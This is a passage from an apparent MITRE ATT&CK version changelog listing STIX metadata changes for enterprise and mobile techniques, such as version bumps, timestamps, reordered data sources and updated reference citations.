external_references[2]['url']https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/mac
external_references[3]['source_name']MacOS VNC software for Remote DesktopVNC Authentication
external_references[3]['description']Apple Support. (n.d.). Set up a computer running VNC software for Remote Desktop. Retrieved August 18, 2021.Tegan. (2019, August 15). Setting up System Authentication. Retrieved September 20, 2021.
external_references[3]['url']https://support.apple.com/guide/remote-desktop/set-up-a-computer-running-vnc-software-apdbed09830/machttps://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
external_references[4]['source_name']VNC AuthenticationHijacking VNC
external_references[4]['description']Tegan. (2019, August 15). Setting up System Authentication. Retrieved September 20, 2021.Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute, Access and Crack). Retrieved September 20, 2021.
external_references[4]['url']https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authenticationhttps://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
external_references[5]['source_name']Hijacking VNCmacOS root VNC login without authentication
external_references[5]['description']Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute, Access and Crack). Retrieved September 20, 2021.Nick Miles. (2017, November 30). Detecting macOS High Sierra root account without authentication. Retrieved September 20, 2021.
external_references[5]['url']https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cchttps://www.tenable.com/blog/detecting-macos-high-sierra-root-account-without-authentication
external_references[6]['source_name']macOS root VNC login without authenticationVNC Vulnerabilities
external_references[6]['description']Nick Miles. (2017, November 30). Detecting macOS High Sierra root account without authentication. Retrieved September 20, 2021.Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities Found in Linux, Windows Solutions. Retrieved September 20, 2021.
external_references[6]['url']https://www.tenable.com/blog/detecting-macos-high-sierra-root-account-without-authenticationhttps://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
external_references[7]['source_name']VNC VulnerabilitiesOffensive Security VNC Authentication Check
external_references[7]['description']Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities Found in Linux, Windows Solutions. Retrieved September 20, 2021.Offensive Security. (n.d.). VNC Authentication. Retrieved October 6, 2021.
external_references[7]['url']https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/https://www.offensive-security.com/metasploit-unleashed/vnc-authentication/
external_references[8]['source_name']Offensive Security VNC Authentication CheckAttacking VNC Servers PentestLab
external_references[8]['description']Offensive Security. (n.d.). VNC Authentication. Retrieved October 6, 2021.Administrator, Penetration Testing Lab. (2012, October 30). Attacking VNC Servers. Retrieved October 6, 2021.
external_references[8]['url']https://www.offensive-security.com/metasploit-unleashed/vnc-authentication/https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
external_references[9]['source_name']Attacking VNC Servers PentestLabHavana authentication bug
external_references[9]['description']Administrator, Penetration Testing Lab. (2012, October 30). Attacking VNC Servers. Retrieved October 6, 2021.Jay Pipes. (2013, December 23). Security Breach! Tenant A is seeing the VNC Consoles of Tenant B!. Retrieved October 6, 2021.
external_references[9]['url']https://pentestlab.blog/2012/10/30/attacking-vnc-servers/http://lists.openstack.org/pipermail/openstack/2013-December/004138.html
external_references[10]['source_name']Havana authentication bugApple Unified Log Analysis Remote Login and Screen Sharing
external_references[10]['description']Jay Pipes. (2013, December 23). Security Breach! Tenant A is seeing the VNC Consoles of Tenant B!. Retrieved October 6, 2021.Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs: Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved August 19, 2021.
external_references[10]['url']http://lists.openstack.org/pipermail/openstack/2013-December/004138.htmlhttps://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
external_references[11]['source_name']Apple Unified Log Analysis Remote Login and Screen SharingGnome Remote Desktop grd-settings
external_references[11]['description']Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs: Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved August 19, 2021.Pascal Nowack. (n.d.). Retrieved September 21, 2021.
external_references[11]['url']https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-loginshttps://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/grd-settings.c#L207
external_references[12]['source_name']Gnome Remote Desktop grd-settingsGnome Remote Desktop gschema
external_references[12]['url']https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/grd-settings.c#L207https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/org.gnome.desktop.remote-desktop.gschema.xml.in
x_mitre_data_sources[1]Logon Session: Logon Session CreationNetwork Traffic: Network Connection Creation
x_mitre_data_sources[2]Network Traffic: Network Connection CreationLogon Session: Logon Session Creation
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Gnome Remote Desktop gschema', 'description': 'Pascal Nowack. (n.d.). Retrieved September 21, 2021.', 'url': 'https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/org.gnome.desktop.remote-desktop.gschema.xml.in'}

[T1125] Video Capture

Current version: 1.1

Dropped Mitigations:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
external_referencesPatrick Wardle. (n.d.). Retrieved March 20, 2018.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-634
values_changed
STIX FieldOld valueNew Value
modified2022-03-15 20:06:04.793000+00:002023-03-30 21:01:37.205000+00:00
external_references[1]['source_name']capecobjective-see 2017 review
external_references[1]['url']https://capec.mitre.org/data/definitions/634.htmlhttps://objective-see.com/blog/blog_0x25.html
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'objective-see 2017 review', 'description': 'Patrick Wardle. (n.d.). Retrieved March 20, 2018.', 'url': 'https://objective-see.com/blog/blog_0x25.html'}

[T1595.002] Active Scanning: Vulnerability Scanning

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-04-15 03:20:09.446000+00:002023-03-13 20:46:31.907000+00:00
external_references[1]['description']OWASP Wiki. (2018, February 16). OAT-014 Vulnerability Scanning. Retrieved October 20, 2020.OWASP. (n.d.). OAT-014 Vulnerability Scanning. Retrieved October 20, 2020.
external_references[1]['url']https://wiki.owasp.org/index.php/OAT-014_Vulnerability_Scanninghttps://owasp.org/www-project-automated-threats-to-web-applications/assets/oats/EN/OAT-014_Vulnerability_Scanning
x_mitre_data_sources[0]Network Traffic: Network Traffic ContentNetwork Traffic: Network Traffic Flow
x_mitre_data_sources[1]Network Traffic: Network Traffic FlowNetwork Traffic: Network Traffic Content

[T1056.003] Input Capture: Web Portal Capture

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
external_referencesAdair, S. (2015, October 7). Virtual Private Keylogging: Cisco Web VPNs Leveraged for Access and Persistence. Retrieved March 20, 2017.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-569
values_changed
STIX FieldOld valueNew Value
modified2020-03-24 21:16:16.580000+00:002023-03-30 21:01:46.711000+00:00
external_references[1]['source_name']capecVolexity Virtual Private Keylogging
external_references[1]['url']https://capec.mitre.org/data/definitions/569.htmlhttps://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Volexity Virtual Private Keylogging', 'description': 'Adair, S. (2015, October 7). Virtual Private Keylogging: Cisco Web VPNs Leveraged for Access and Persistence. Retrieved March 20, 2017.', 'url': 'https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/'}

[T1550.004] Use Alternate Authentication Material: Web Session Cookie

Current version: 1.3

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.1.0
external_referencesRehberger, J. (2018, December). Pivot to the Cloud using Pass the Cookie. Retrieved April 5, 2019.
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-60
values_changed
STIX FieldOld valueNew Value
modified2021-10-12 14:22:09.650000+00:002023-03-30 21:01:51.836000+00:00
external_references[1]['source_name']capecPass The Cookie
external_references[1]['url']https://capec.mitre.org/data/definitions/60.htmlhttps://wunderwuzzi23.github.io/blog/passthecookie.html
external_references[2]['source_name']Pass The CookieUnit 42 Mac Crypto Cookies January 2019
external_references[2]['description']Rehberger, J. (2018, December). Pivot to the Cloud using Pass the Cookie. Retrieved April 5, 2019.Chen, Y., Hu, W., Xu, Z., et. al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges’ Cookies. Retrieved October 14, 2019.
external_references[2]['url']https://wunderwuzzi23.github.io/blog/passthecookie.htmlhttps://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/
x_mitre_data_sources[0]Web Credential: Web Credential UsageApplication Log: Application Log Content
x_mitre_data_sources[1]Application Log: Application Log ContentWeb Credential: Web Credential Usage
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'Unit 42 Mac Crypto Cookies January 2019', 'description': 'Chen, Y., Hu, W., Xu, Z., et. al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges’ Cookies. Retrieved October 14, 2019.', 'url': 'https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/'}

[T1505.003] Server Software Component: Web Shell

Current version: 1.3

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-19 20:11:07.800000+00:002023-03-30 21:01:53.223000+00:00
x_mitre_data_sources[0]Network Traffic: Network Traffic ContentProcess: Process Creation
x_mitre_data_sources[1]File: File ModificationNetwork Traffic: Network Traffic Content
x_mitre_data_sources[2]Network Traffic: Network Traffic FlowApplication Log: Application Log Content
x_mitre_data_sources[3]Application Log: Application Log ContentNetwork Traffic: Network Traffic Flow
x_mitre_data_sources[5]Process: Process CreationFile: File Modification
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/650.html', 'external_id': 'CAPEC-650'}

[T1547.004] Boot or Logon Autostart Execution: Winlogon Helper DLL

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-20 16:32:14.691000+00:002023-03-30 21:01:47.069000+00:00
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/579.html', 'external_id': 'CAPEC-579'}

mobile-attack

Minor Version Changes

[T1626] Abuse Elevation Control Mechanism

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-05 16:53:29.994000+00:002023-03-15 16:23:59.281000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1517] Access Notifications

Current version: 1.2

Version changed from: 1.1 → 1.2

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-11 15:54:08.965000+00:002023-03-15 16:26:05.050000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.11.2

[T1640] Account Access Removal

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-06 13:29:47.590000+00:002023-03-15 16:34:51.917000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1638] Adversary-in-the-Middle

Current version: 2.1

Version changed from: 2.0 → 2.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-11 19:27:44.048000+00:002023-03-15 16:39:32.207000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version2.02.1

[T1429] Audio Capture

Current version: 3.1

Version changed from: 3.0 → 3.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-29 17:29:49.023000+00:002023-03-16 13:31:29.924000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version3.03.1

[T1481.002] Web Service: Bidirectional Communication

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-06 15:47:06.071000+00:002023-03-16 13:32:55.266000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1398] Boot or Logon Initialization Scripts

Current version: 2.1

Version changed from: 2.0 → 2.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-11 14:33:11.096000+00:002023-03-16 18:26:46.043000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version2.02.1

[T1624.001] Event Triggered Execution: Broadcast Receivers

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-19 16:49:10.650000+00:002023-03-16 18:27:42.752000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1636.001] Protected User Data: Calendar Entries

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-11 19:33:41.984000+00:002023-03-16 18:28:28.234000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1616] Call Control

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
external_referencesGoogle. (2021, August 11). Manifest.permission. Retrieved September 22, 2021.
external_referencesCEL-18
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesAPP-41
external_referencesGoogle. (2021, August 11). Manifest.permission. Retrieved September 22, 2021.
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:09:07.609000+00:002023-03-16 18:31:37.189000+00:00
external_references[1]['source_name']NIST Mobile Threat CatalogueAndroid Permissions
external_references[1]['url']https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-41.htmlhttps://developer.android.com/reference/android/Manifest.permission
external_references[2]['url']https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-42.htmlhttps://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-41.html
external_references[2]['external_id']CEL-42APP-41
external_references[3]['url']https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-36.htmlhttps://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-42.html
external_references[3]['external_id']CEL-36CEL-42
external_references[4]['url']https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-18.htmlhttps://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-36.html
external_references[4]['external_id']CEL-18CEL-36
external_references[5]['source_name']Android PermissionsNIST Mobile Threat Catalogue
external_references[5]['url']https://developer.android.com/reference/android/Manifest.permissionhttps://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-18.html
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1636.002] Protected User Data: Call Log

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-29 17:29:34.081000+00:002023-03-16 18:32:30.150000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1414] Clipboard Data

Current version: 3.1

Version changed from: 3.0 → 3.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-19 19:29:45.323000+00:002023-03-16 18:33:20.042000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version3.03.1

[T1632.001] Subvert Trust Controls: Code Signing Policy Modification

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-21 17:31:50.071000+00:002023-03-16 18:37:55.822000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1623] Command and Scripting Interpreter

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-06 12:14:24.393000+00:002023-03-20 15:16:19.547000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1645] Compromise Client Software Binary

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-08 15:38:38.744000+00:002023-03-20 15:20:11.752000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1474.002] Supply Chain Compromise: Compromise Hardware Supply Chain

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-05 16:40:45.961000+00:002023-03-20 15:21:12.603000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1474.001] Supply Chain Compromise: Compromise Software Dependencies and Development Tools

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-05 16:39:08.984000+00:002023-03-20 15:28:54.940000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1474.003] Supply Chain Compromise: Compromise Software Supply Chain

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-05 16:43:41.342000+00:002023-03-20 15:32:37.109000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1636.003] Protected User Data: Contact List

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-11 19:38:50.942000+00:002023-03-20 15:40:11.937000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1634] Credentials from Password Store

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-05 17:08:36.315000+00:002023-03-20 15:45:44.103000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1471] Data Encrypted for Impact

Current version: 3.2

Version changed from: 3.1 → 3.2

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-06 13:31:22.485000+00:002023-03-20 15:55:09.397000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version3.13.2

[T1641] Data Manipulation

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-06 13:35:57.044000+00:002023-03-20 15:55:32.497000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1481.001] Web Service: Dead Drop Resolver

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-06 15:41:03.914000+00:002023-03-20 15:56:04.790000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1626.001] Abuse Elevation Control Mechanism: Device Administrator Permissions

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-06 14:19:17.679000+00:002023-03-20 15:56:34.537000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1629.002] Impair Defenses: Device Lockout

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-05 16:59:33.363000+00:002023-03-20 18:39:10.201000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1629.003] Impair Defenses: Disable or Modify Tools

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-05 16:59:57.851000+00:002023-03-20 18:40:12.912000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1630.003] Indicator Removal on Host: Disguise Root/Jailbreak Indicators

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-11 15:46:23.223000+00:002023-03-20 18:18:29.556000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1407] Download New Code at Runtime

Current version: 1.4

Version changed from: 1.3 → 1.4

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-06 12:26:31.735000+00:002023-03-20 18:21:59.494000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.31.4

[T1456] Drive-By Compromise

Current version: 2.1

Version changed from: 2.0 → 2.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-19 15:32:30.837000+00:002023-03-20 18:24:56.530000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version2.02.1

[T1642] Endpoint Denial of Service

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-19 21:17:48.281000+00:002023-03-20 18:41:56.376000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1624] Event Triggered Execution

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-29 17:28:39.379000+00:002023-03-20 18:43:46.177000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1627] Execution Guardrails

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-11 15:08:20.821000+00:002023-03-20 18:44:26.317000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1404] Exploitation for Privilege Escalation

Current version: 2.1

Version changed from: 2.0 → 2.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-03-30 15:51:08.258000+00:002023-03-20 18:49:53.301000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version2.02.1

[T1428] Exploitation of Remote Services

Current version: 1.2

Version changed from: 1.1 → 1.2

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-06 12:45:44.023000+00:002023-03-20 18:51:07.651000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.11.2

[T1630.002] Indicator Removal on Host: File Deletion

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-21 17:32:45.989000+00:002023-03-20 18:52:24.758000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1420] File and Directory Discovery

Current version: 1.2

Version changed from: 1.1 → 1.2

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-19 19:52:12.345000+00:002023-03-20 18:53:35.087000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.11.2

[T1541] Foreground Persistence

Current version: 2.1

Version changed from: 2.0 → 2.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-08 15:38:03.160000+00:002023-03-20 18:54:25.564000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version2.02.1

[T1417.002] Input Capture: GUI Input Capture

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-05 19:48:31.195000+00:002023-03-20 18:55:51.676000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1643] Generate Traffic from Victim

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-06 13:55:14.390000+00:002023-03-20 18:57:17.144000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1627.001] Execution Guardrails: Geofencing

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-21 17:30:57.081000+00:002023-03-20 18:58:14.240000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1628] Hide Artifacts

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-08 15:44:24.536000+00:002023-03-20 18:59:57.485000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1625] Hijack Execution Flow

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-05 16:52:19.152000+00:002023-03-20 18:59:46.686000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1629] Impair Defenses

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-05 16:57:50.075000+00:002023-03-20 18:59:55.849000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1430.002] Location Tracking: Impersonate SS7 Nodes

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-21 13:44:56.301000+00:002023-03-20 18:41:45.256000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1630] Indicator Removal on Host

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-08 15:44:56.484000+00:002023-03-20 18:42:18.121000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1544] Ingress Tool Transfer

Current version: 2.1

Version changed from: 2.0 → 2.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-06 14:46:25.107000+00:002023-03-20 18:43:44.687000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version2.02.1

[T1417] Input Capture

Current version: 2.3

Version changed from: 2.2 → 2.3

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-11 18:48:26.111000+00:002023-03-20 18:44:36.145000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version2.22.3

[T1634.001] Credentials from Password Store: Keychain

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-05 17:09:03.861000+00:002023-03-20 18:45:39.362000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1417.001] Input Capture: Keylogging

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-19 19:37:19.862000+00:002023-03-20 18:48:39.936000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1430] Location Tracking

Current version: 1.2

Version changed from: 1.1 → 1.2

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-01 17:05:16.493000+00:002023-03-20 18:50:21.363000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.11.2

[T1464] Network Denial of Service

Current version: 1.3

Version changed from: 1.2 → 1.3

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-06 13:26:42.303000+00:002023-03-20 18:51:23.109000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.21.3

[T1509] Non-Standard Port

Current version: 2.1

Version changed from: 2.0 → 2.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-06 14:50:16.409000+00:002023-03-20 18:51:58.228000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version2.02.1

[T1481.003] Web Service: One-Way Communication

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-06 15:52:07.711000+00:002023-03-20 18:53:34.118000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1644] Out of Band Data

Current version: 2.1

Version changed from: 2.0 → 2.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-29 17:29:15.978000+00:002023-03-20 18:53:59.025000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version2.02.1

[T1629.001] Impair Defenses: Prevent Application Removal

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-05 16:59:01.549000+00:002023-03-20 18:54:36.502000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1424] Process Discovery

Current version: 2.1

Version changed from: 2.0 → 2.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-03-30 20:32:19.942000+00:002023-03-20 18:55:23.702000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version2.02.1

[T1631] Process Injection

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-05 17:05:09.653000+00:002023-03-20 18:55:54.442000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1636] Protected User Data

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-11 19:31:34.018000+00:002023-03-20 18:56:20.270000+00:00
x_mitre_attack_spec_version2.1.03.1.0
x_mitre_version1.01.1

[T1604] Proxy Through Victim

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_deprecatedFalse
